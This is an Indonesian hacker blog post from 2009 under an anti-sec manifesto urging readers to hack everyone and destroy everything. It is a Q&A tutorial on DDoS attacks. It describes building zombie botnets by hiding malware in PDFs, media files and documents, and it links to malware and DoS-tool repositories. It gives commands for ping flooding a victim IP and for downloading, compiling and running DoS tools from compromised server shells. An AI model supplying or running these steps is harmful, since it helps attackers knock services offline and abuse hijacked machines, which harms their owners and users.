_____ __ _____ ___ _____ ___ _____ _____ _____ _____ _____ _____ _____ _____ ____ _____ _ _ _ _____ | __|| | | | ||_ | | | || | | | __|| __|| __ || | || __|| __ | | || __| | \ | || | | || | | | __|| |__ | | | _| |_ | | | ||_ | |__ || __|| -|| | || __|| -| |- -||__ | | | || | || | | || | | | |_____||_____| \___/ |_____||_|___| |_| |_____||_____||__|__| \___/ |_____||__|__| |_____||_____| |____/ |_____||_____||_|___| I DONT WANT TO BE FAME , I DONT WANT TO BE ANY EZINE , I JUST WANT TO SHARE KNOWLEDGE
, ----. ~ Fuck full-disclosure - - ` ~ Fuck the security industry ,__.,' \ ~ Keep 0days private .' *` ~ Hack everyone you can and then hack some more / | | / **\ ~ Blend in. . / ****. ~ Get trusted. | mm | ****| ~ Trust no one. \ | ****| ~ Own everyone. ` ._______ \ ****/ ~ Disclose nothing. \ /`---' ~ Destroy everything. \___( ~ Take back the scene /~~~~\ ~ Never sell out, never surrender. / \ ~ Get in as anonymous, Leave with no trace. / | \ ~ This your Fucking IP | | \ ~ This your Fucking ISP , ~~ . |, ~~ . | |\ ~ FUCK OFF I've got enough friends !!!! ( |||| ) ( |||| )(,,,)` ( |||||| )-( |||||| ) | ^ ( |||||| ) ( |||||| ) |'/ ( |||||| )-( |||||| )___,'- ( |||| ) ( |||| ) ` ~~ ' ` ~~ '

[ Blog ]

[ History ]


DDOS

kali ini vina akan bahas topict tentang ddos ,

ddos ( Distributed denial of service ) itu merupakan serangan yang digunakan untuk menghabiskan bandiwith si korban .


kebanyakan attacker sudah mempersiapkan jumlah server untuk menyerang traffict si korban.

adapun juga si attacker sudah memiliki zombie, untuk melakukan aksinya.


vina akan bahas sedikit konsepnya .

-> penggunaan zombie

ini adalah hal paling terparah di sepanjang ilmu networking, zombie bisa di bilang adalah sebuah mesin yang bisa di pakai oleh attacker untuk memanfaatkan source.
biasanya zombie sudah menginfeksi jutaan pc di dalam negri, zombie itu sendiri termasuk golongan trojan. hmmm..

-> question <-
apakah komputer kita bisa terinfeksi zombie ?

-> answer <-
ya bisa saja komputer anda terinfeksi zombie, dikarenakan zombie tidak bisa di liat oleh kasat mata, liat saja traffict" yang mencurigakan di dalam pc kita , mungkin ada autoupdate atau dimana kita melakukan perintah "ps-aux" , banyak listen port yang melaju ke jaringan kita,

-> question <-
bagaimana kita bisa membuat zombie

-> answer <-
untuk membuat zombie dan menginfeksikan ke korban, kita cukup membuat malware sederhana, teknik bervariant , antaralain , kita bisa kirimkan ke korban tool / software kecil yang sudah kita sisipi malware. ataupun kita bisa melakukan fake action, semacam membuat malware dan menyisipi script *berbahaya ke dalam pdf,mp3,video,ataupun document yang memiliki turunan IIS. atau anda bisa cek di situs http://www.trojanlibrary.net/

-> question <-
bagaimana cara kita melakukan ddos ?

-> answer <-
bermacam" pola penyerangan untuk melakukan hal ini ,

1. serangan lewat bot dalam IRC
2. serangan dengan memanfaatkan source kita sendiri
3. serangan dengan memanfaatkan source server

-> question <-

bisa anda berikan sedikit contoh untuk melakuakan hal tersebut

-> answer <-
saya akan berikan sedikit contoh cara melakuakan dos pada source kita dan source server.

1) dos dengan memanfaatkan source kita sendiri -> adapun teknik yang lazim . kita cukup melakukan flood request ke korban
contoh "ping" . ping berarti kita memanggil server korban . bilamana kita terus
menerus melakukan permintaan / request secara terus menerus. dan jika server tidak
kuat , makan akan mengakibatkan server crash.

contoh : r00t3d$> ping -l 86600 ipkorban

teknik ini bisa di bilang " Ping of Death Attack "

2) dos dengan memanfaatkan server luar

-> mungkin sudah banyak yang mengetahui teknik ini. dengan cara memanfaatkan shell
dari server hasil injekan. kalian bisa saja menggunakan banyak xpl nya disini
http://packetstorm.linuxsecurity.com/DoS/
atau disini
http://ripperzcrewz.wordpress.com/dos-and-ddos-tools/
pilihlah sesuka hati kalian

#serangan dalam shell.
contoh : buka shell kalian , lalu download source ini
wget http://packetstorm.linuxsecurity.com/DoS/ascend-foo.c
compile dulu source nya . atau rubah perm menjadi 777 agar bisa di
eksekusi " $gcc -o ascend-foo.c ascend-foo
lakukan serangan ^_^

#serangan dalam server ssh
contoh : login ke shell kalian, lalu download source nya disini
wget http://packetstorm.linuxsecurity.com/DoS/udp.pl
compile dulu source nya . atau rubah perm menjadi 777 agar bisa di
lakukan serangan , ^_^ bilamana shell kita tidak mensupport perl, lakukan
perubahan permition .
contoh




-> question <-

apakah kita bisa mengantisipasi serangan tersebut ?


-> answer <-
mungkin anda bisa membaca postingan vina sebelumnya di http://elv1n4.blogspot.com/2009/05/ko-with-ddos-attack_9264.html


-> question <-

ok terimakasih ^_^

-> answer <-

ya sama" ^_^

Labels:


On 12/9/09 at 2:46 PM



My Profile:


Biography:

short story:

[ Friends Link ]

[ chat with me ]


[ archives ]

[ Notices ]

By title

DDOS

By month

2002.03 2002.12 2005.12 2008.11 2009.02 2009.03 2009.04 2009.05 2009.06 2009.07 2009.08 2009.09 2009.10 2009.11 2009.12 2010.01 2010.03



 


elv1n4 Themes v2.0.0 © 2009 by elv1n4

www[dot]elv1n4.anti-sec[dot]org